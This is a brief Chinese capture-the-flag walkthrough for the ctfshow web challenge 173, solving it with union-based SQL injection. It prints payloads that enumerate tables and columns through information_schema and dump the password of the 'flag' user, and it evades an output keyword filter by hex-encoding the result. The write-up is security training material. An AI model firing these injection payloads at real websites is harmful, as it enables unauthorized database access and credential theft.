ctf show web 入门173

1' union select 1,table_name,3 from information_schema.tables where table_schema=database()--+

1' union select 1,column_name,3 from information_schema.columns where table_name='ctfshow_user3'--+

这里跟上一题的不同之处在于:

1.原本只查询了 username, password 两个字段,现在变成了 id, username, password 三个字段

所以payload要改变为:-1' union select 1, 'hack', password from ctfshow_user3 where username='flag'--+

2.上一关只是检查 username 是不是 'flag'。而这一关,它把整个返回的数组 $ret 转换成了 JSON 字符串,然后用正则表达式模糊匹配只要任何一个角落包含 f-l-a-g 四个字母就不行 preg_match('/flag/i', ...) 检查

  • 这意味着: 只要最终返回给前端的整行数据里,包含"flag"这四个字母(不区分大小写),就会直接触发拦截,比如,假设密码中有flag也会把回显的内容过滤掉,此时我们使用HEX(password)把返回的密码编码从而绕过限制
相关推荐
Lkstar1 小时前
万字长文Query改写与多路召回实战|从HyDE到RRF融合,召回率提升22%的完整方案
数据库·人工智能·llm
IT新视界1 小时前
星环科技ArgoDB:基于一体化架构构建数据全生命周期安全底座
数据库·科技·安全·架构
峥无1 小时前
MySQL DML 操作(CRUD)总结
数据库·mysql
辣香牛肉面2 小时前
CintaNotes个人笔记管理软件v3.14(v3.13.0 绿色汉化版)
笔记
数据库小学妹2 小时前
SQL Server数据库同步工具怎么选?6款方案对比+信创迁移避坑清单
数据库·经验分享·sqlserver·dba
不剪发的Tony老师2 小时前
国产数据库之GaussDB:固若金汤
数据库·gaussdb
雨辰AI3 小时前
生产级实测:SpringBoot3 + 达梦数据库接口从 200ms 优化至 20ms 完整调优指南
java·数据库·spring boot·后端·政务
凡人叶枫3 小时前
Effective C++ 条款39:明智而审慎地使用 private 继承
java·数据库·c++·嵌入式开发
基德爆肝c语言3 小时前
MySQL表的操作
前端·数据库·mysql
GreatSQL4 小时前
gt-checksum v4.0.0 新功能解读系列文章(1):断点续传——大任务中断不再从头跑
mysql